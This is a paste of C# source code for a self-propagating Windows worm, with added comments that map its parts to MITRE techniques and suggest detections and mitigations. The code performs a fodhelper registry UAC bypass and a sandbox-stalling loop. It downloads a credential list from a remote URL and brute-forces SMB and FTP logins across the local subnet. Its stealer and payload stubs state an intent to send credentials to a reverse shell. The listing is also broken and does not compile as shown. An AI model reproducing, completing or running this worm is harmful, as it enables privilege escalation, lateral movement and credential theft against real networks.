FlyFar

bdunlap9's C# Worm - Source Code

Jul 4th, 2023
C# 6.77 KB | Cybersecurity | 0 0
  1. using System;
  2. using System.IO;
  3. using System.Threading;
  4. using System.Net;
  5. using System.Net.Sockets;
  6. using Microsoft.Win32;
  7.  
  8. namespace Worm
  9. {
          // Analysis notes (defensive reading of this paste).
          // The class sketches a self-propagating Windows program: a stalling loop (junk),
          // a registry write that the author labels a fodhelper.exe privilege escalation (privEsc),
          // four comment-only stub routines, and a subnet walk that tries a downloaded
          // credential list against SMB and FTP (SMBFTP).
          // NOTE(review): the listing does not appear to compile as pasted (it references types
          // that the visible code neither defines nor imports), so treat it as a statement of
          // intent when writing detections rather than as a working sample.
  10.     class Program
  11.     {  
              // Writes two values under HKCU\Software\Classes\ms-settings\shell\open\command:
              // the default value is set to this executable's path and "DelegateExecute" is set
              // to "fodhelper.exe". The author's comment names this the fodhelper.exe UAC bypass
              // (MITRE ATT&CK T1548.002, Bypass User Account Control).
              // Detection: alert on registry value-set events for this key path (e.g. Sysmon
              // Event ID 13) and on fodhelper.exe starting unexpected child processes.
              // Mitigation: keep interactive users out of the local Administrators group and
              // set UAC to "Always notify".
  12.         static void privEsc()
  13.         {
  14.             // Windows 10 priv esc method via fodhelper.exe and registry
  15.             // Get the path of the current running executable
  16.             string exePath = System.Reflection.Assembly.GetExecutingAssembly().Location;
  17.  
  18.             // Set the registry key value
  19.             Registry.SetValue(@"HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command", "", exePath, RegistryValueKind.String);
  20.  
  21.             // Set the registry key value for "DelegateExecute"
  22.             Registry.SetValue(@"HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command", "DelegateExecute", "fodhelper.exe", RegistryValueKind.String);
  23.         }
  24.  
              // Stalls for about 30 seconds, writing one random character (code points 32-127)
              // to the console every 10 ms. Main's comment describes this as basic AV evasion,
              // i.e. time-based stalling (MITRE ATT&CK T1497.003); only the 30-second loop is
              // present in this listing.
              // Defender note: analysis sandboxes with short detonation windows can miss
              // behaviour that starts after a delay like this; use longer windows or sleep
              // acceleration when detonating similar samples.
  25.         static void junk()
  26.         {
  27.             Random random = new Random();
  28.             var stopTime = DateTime.Now.AddSeconds(30);
  29.  
  30.             while (DateTime.Now < stopTime)
  31.             {
  32.                 Console.Write((char)random.Next(32, 128));
  33.                 Thread.Sleep(10);
  34.             }
  35.         }
  36.  
              // Stub: contains no executable statements. The author's comments state an intent
              // to collect host information/identifiers and upload them to a dashboard.
              // Main does not call this method.
  37.         static void gatherInfo():
  38.         {
  39.             // Gather computer info and identifiers
  40.  
  41.  
  42.             // upload to dashboard
  43.  
  44.         }
  45.  
              // Stub: contains no executable statements; the comment states the intended behaviour.
  46.         static void Stealer()
  47.         {
  48.             // save data and upload to dashboard with user information
  49.  
  50.         }
  51.  
              // Stub: contains no executable statements. Called from SMBFTP after an FTP login succeeds.
  52.         static void ftp_Payload()
  53.         {
  54.             // save credentials & send back to reverse shell
  55.  
  56.         }
  57.  
              // Stub: contains no executable statements. Called from SMBFTP inside the SMB client block.
  58.         static void smb_Payload()
  59.         {
  60.             // save credentials & send back to reverse shell
  61.  
  62.         }
  63.  
              // Builds a list of username/password pairs from a remote text file, then walks host
              // numbers 1-254 under the local address prefix, attempting a TCP connection to port
              // 445 (SMB) and port 21 (FTP) on each and trying every pair against hosts that answer.
              // Maps to MITRE ATT&CK T1046 (Network Service Discovery), T1110 (Brute Force) and
              // T1021.002 (SMB/Windows Admin Shares).
              // Detection: one workstation opening connections to many internal addresses on
              // 445/21 in sequence; bursts of failed logons (Windows Security Event ID 4625) on
              // many hosts from a single source address; failed logins in FTP server logs.
              // Mitigation: block workstation-to-workstation SMB with host firewalls or
              // segmentation, retire FTP, enforce account lockout, and avoid shared or default
              // credentials across hosts.
  64.         static void SMBFTP()
  65.         {
  66.             // Get the IP address of the local machine
  67.             string host = Dns.GetHostName();
  68.             IPHostEntry ip = Dns.GetHostEntry(host);
                  // Uses the first address returned for the local host name.
  69.             IPAddress localAddress = ip.AddressList[0];
  70.  
  71.             // Get the subnet mask of the local machine
  72.             IPInterfaceProperties adapterProperties = NetworkInformation.GetIPProperties(localAddress);
  73.             IPAddress mask = adapterProperties.UnicastAddresses[0].IPv4Mask;
  74.  
  75.             // Calculate the subnet address
  76.             byte[] ipAdressBytes = localAddress.GetAddressBytes();
  77.             byte[] subnetMaskBytes = mask.GetAddressBytes();
  78.             byte[] subnetAddressBytes = new byte[ipAdressBytes.Length];
  79.             for (int i = 0; i < subnetAddressBytes.Length; i++)
  80.             {
  81.                 subnetAddressBytes[i] = (byte)(ipAdressBytes[i] & subnetMaskBytes[i]);
  82.             }
  83.             IPAddress subnetAddress = new IPAddress(subnetAddressBytes);
  84.  
  85.             // Download the credentials from the GitHub repository
                  // The URL carries a literal <repo_name> placeholder; the paste names no real repository.
                  // Defender note: an outbound fetch of a raw text file by a non-developer endpoint,
                  // followed by internal connection fan-out, is a useful correlation.
  86.             WebClient client = new WebClient();
  87.             string credentials = client.DownloadString("https://raw.githubusercontent.com/<repo_name>/credentials.txt");
  88.             string[] lines = credentials.Split('\n');
  89.             List<Tuple<string, string>> credList = new List<Tuple<string, string>>();
                  // Lines are consumed two at a time; each pair is later passed to NetworkCredential
                  // as (user name, password).
  90.             for (int i = 0; i < lines.Length; i+=2)
  91.             {
  92.                 credList.Add(new Tuple<string, string>(lines[i], lines[i+1]));
  93.             }
  94.  
  95.             // Scan all IP addresses in the subnet
  96.             int portNumber;
  97.             TcpClient client = new TcpClient();
  98.             for (int i = 1; i < 255; i++)
  99.             {
  100.                 // Check if SMB port (445) is open
                       // Target text = subnet address up to its last '.', plus i; only the final octet varies.
  101.                 string remoteAddress = subnetAddress.ToString().Substring(0, subnetAddress.ToString().LastIndexOf('.') + 1) + i.ToString();
  102.                 try
  103.                 {
  104.                     client.Connect(remoteAddress, 445);
  105.                     Console.WriteLine(remoteAddress + " has open SMB port.");
  106.                     foreach (var cred in credList)
  107.                     {
  108.                         try
  109.                         {
  110.                             NetworkCredential networkCredential = new NetworkCredential(cred[0], cred[1]);
  111.                             using (var smbClient = new SmbClient(remoteAddress, networkCredential))
  112.                             {
                                       // The result line written here includes the user name and password that were tried.
  113.                                 Console.WriteLine("Successfully connected to " + remoteAddress + " using " + cred[0] + "/" + cred[1]);
  114.                                 smb_Payload();
  115.                             }
                                   // Stops trying further pairs against this host once the block above completes.
  116.                             break;
  117.                         }
  118.                         catch (Exception)
  119.                         {
  120.                             Console.WriteLine("Failed to connect to " + remoteAddress + " using " + cred[0] + "/" + cred[1]);
  121.                         }
  122.                     }
  123.                 }
  124.                 catch (Exception)
  125.                 {
                           // Any exception from the port 445 attempt is swallowed; the loop moves on.
  126.                     // Console.WriteLine(remoteAddress + " does not have open SMB port.");
  127.                 }
  128.  
  129.                 // Check if FTP port (21) is open
  130.                 try
  131.                 {
  132.                     client.Connect(remoteAddress, 21);
  133.                     Console.WriteLine(remoteAddress + " has open FTP port.");
  134.                     foreach (var cred in credList)
  135.                     {
  136.                         try
  137.                         {
  138.                             FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://" + remoteAddress);
  139.                             request.Credentials = new NetworkCredential(cred[0], cred[1]);
                                   // A directory listing request is used as the login check.
  140.                             request.Method = WebRequestMethods.Ftp.ListDirectory;
  141.  
  142.                             FtpWebResponse response = (FtpWebResponse)request.GetResponse();
  143.                             Console.WriteLine("Connected to the FTP server successfully using credentials: " + cred[0] + "," + cred[1]);
  144.                             response.Close();
  145.                             ftp_Payload();
  146.                             break;
  147.                         }  
  148.                         catch (WebException ex)
  149.                         {
                                   // Failed FTP attempts are swallowed silently; the next pair is tried.
  150.                             // Console.WriteLine("Failed to connect to the FTP server using credentials: " + cred[0] + "," + cred[1]);
  151.                         }
  152.                     }
  153.                 }
  154.                 catch (Exception)
  155.                 {
  156.                     // Console.WriteLine(remoteAddress + " does not have open FTP port.");
  157.                 }
  158.             }
                   // Blocks on a key press after the last host has been tried.
  159.             Console.ReadKey();
  160.         }
  161.  
               // Entry point: invokes junk, privEsc, Stealer and SMBFTP in that order.
               // gatherInfo is never called from here.
  162.         static void Main(string[] args)
  163.         {
  164.             // Init class
  165.             Program worm = new Program();
  166.  
  167.             // junk code for 30 seconds and wait another 10 secs before executing the rest for basic AV Evasion
  168.             worm.junk();
  169.  
  170.             // Priv Escalation
  171.             worm.privEsc();
  172.  
  173.             // Stealer
  174.             worm.Stealer();
  175.  
  176.             // Scan for new targets
  177.             worm.SMBFTP();
  178.         }
  179.     }
  180. }
Tags: malware worm